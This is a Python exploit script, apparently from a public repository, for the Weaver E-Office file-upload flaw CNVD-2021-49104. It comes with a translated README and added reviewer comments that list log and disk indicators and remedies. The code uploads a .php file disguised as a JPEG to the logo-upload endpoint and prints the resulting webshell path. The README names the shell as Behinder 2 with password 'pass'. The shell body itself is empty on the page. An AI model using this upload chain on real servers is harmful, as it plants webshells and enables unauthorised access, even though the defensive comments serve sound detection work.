#!/usr/bin/python
# -*- coding:utf-8 -*-
#
# Repository layout, as listed on the page:
#   ├── 1.png         https://raw.githubusercontent.com/bigsizeme/CNVD-2021-49104/HEAD/1.png
#   ├── README.md
#   └── e-oeffice.py  (this file)
#
# README.md (translated to English):
#   # CNVD-2021-49104
#   CNVD-2021-49104 -- Weaver (泛微) E-Office file upload vulnerability.
#   The uploaded webshell is Behinder (冰蝎) 2, password "pass".
#   Usage is shown in the screenshot:
#   ![Alt text](https://github.com/bigsizeme/CNVD-2021-49104/blob/main/1.png)
#
# What the visible code does: it sends one multipart POST to the E-Office
# logo-upload endpoint with a part named "Filedata" whose filename is
# "b.php" and whose declared content type is image/jpeg, prints the response
# body, and, if that body equals 'logo-eoffice.php', prints the resulting
# path under /images/logo/.
#
# Review notes for defenders, taken only from the strings in this file:
#   * Request to look for in web logs: POST to
#     /general/index/UploadFile.php with m=uploadPicture and
#     uploadType=eoffice_logo, and an empty userId parameter.
#   * File to look for on disk: logo-eoffice.php under images/logo/ in the
#     web root.
#   * The part is sent with a .php filename but an image content type, so the
#     server side presumably trusts the client-declared type. The handler is
#     not shown here, so confirm against the vendor advisory. The usual
#     remedies are the vendor patch, server-side validation of extension and
#     content, and denying script execution in the upload directory.
import requests
import sys
import json
import os
import time
import string
import argparse
import readchar
import random
from requests_toolbelt.multipart.encoder import MultipartEncoder


# Start-up banner. It is not a raw string, so a backslash at the end of a line
# acts as a line continuation inside the literal. Inner whitespace is
# reproduced as it appears on the page.
banner ='''
______ ______ ______ ______ ________ ______ ______
/_____/\ /_____/\/_____/\/_____/\/_______/\/_____/\/_____/\
\::::_\/_ ______\:::_ \ \::::_\/\::::_\/\__.::._\/\:::__\/\::::_\/_
\:\/___/\/______/\:\ \ \ \:\/___/\:\/___/\ \::\ \ \:\ \ _\:\/___/\
\::___\/\__::::\/\:\ \ \ \:::._\/\:::._\/ _\::\ \__\:\ \/_/\::___\/_
\:\____/\ \:\_\ \ \:\ \ \:\ \ /__\::\__/\\:\_\ \ \:\____/\
\_____\/ \_____\/\_\/ \_\/ \________\/ \_____\/\_____\/

https://github.com/bigsizeme/
'''
print(banner)
# Every request is routed through a fixed local HTTP proxy on port 8099.
proxies = {'http': 'http://127.0.0.1:8099', 'https': 'http://127.0.0.1:8099'}

def random_string_generator(str_size, allowed_chars):
    """Return a string of `str_size` characters drawn from `allowed_chars`.

    Uses `random.choice`, which is not a cryptographic source. Nothing in the
    visible code calls this helper.
    """
    return ''.join(random.choice(allowed_chars) for x in range(str_size))
# Alphabet defined next to the helper above; also unused in the visible code.
chars = string.ascii_letters


def getPath(url):
    """POST the multipart upload to `url` and return the response body.

    Args:
        url: Base URL of the E-Office instance, as given on the command line.

    Returns:
        The response text when the HTTP status is 200. Otherwise the function
        prints "error" and falls off the end, so it returns None.
    """
    if '://' not in url:
        target = 'https://%s' % url if ':443' in url else 'http://%s' % url
    else:
        target = url
    temp = "/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId="
    # NOTE(review): the value computed in the if/else above is discarded here;
    # the request URL is built from the raw `url` argument.
    target = url+temp
    # The payload body (lines 42-73 of the original listing) is not present on
    # this page; what remains is an empty triple-quoted string.
    shellCode = ''''''
    # All header values are fixed literals, including Content-Length. The
    # boundary in Content-Type is the same string passed to MultipartEncoder
    # below.
    headers = {'Content-Type': 'multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4','User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0','Accept-Language':'en-US,en;q=0.5','Accept-Encoding':'gzip, deflate','X-Requested-With':'XMLHttpRequest','Content-Length':'606'}

    # The part is sent with a .php filename but declared as image/jpeg.
    multipart_encoder = MultipartEncoder(
        fields={
            "Filedata": (
                "b.php", shellCode, 'image/jpeg'),
            "typeStr": "File"
        },
        boundary='e64bdf16c554bbc109cecef6451c26a4'
    )
    # verify=False turns off TLS certificate validation for this request.
    response = requests.post(url=target,headers=headers,data=multipart_encoder,proxies=proxies,verify=False)

    if response.status_code ==200:
        null =""  # assigned but never read
        text =response.text
        print(text)
        return text
    else:
        print("error")


def parse_args():
    """Parse the command line and return the argparse namespace.

    `-u/--url` is declared with required=True, so its default is never used.
    `-c/--cmd` is parsed, but the visible code only stores it in `cmd`.
    """
    # parse the arguments
    parser = argparse.ArgumentParser(epilog="\tExample: \r\npython " + sys.argv[0] + " -u target")
    parser._optionals.title = "OPTIONS"
    parser.add_argument('-u', '--url', help="Target url.", default="http://127.0.0.1:8080", required=True)
    parser.add_argument('-c', '--cmd', help="Commond", default="whoami", required=False)
    return parser.parse_args()

if __name__ == '__main__':
    args = parse_args()
    url = args.url
    # Drop a single trailing slash so the path concatenation in getPath does
    # not produce a double slash.
    if url.endswith("/"):
        url = url[:-1]
    print(url)
    cmd = args.cmd  # stored but not used afterwards
    path = getPath(url)
    # A response body equal to 'logo-eoffice.php' is treated as the name of
    # the stored file.
    if path=='logo-eoffice.php':
        print("shell path: "+url+"/images/logo/logo-eoffice.php?pass")
    # print("\nvul:%s url:%s\t\n" %(str(r["vul"]),url))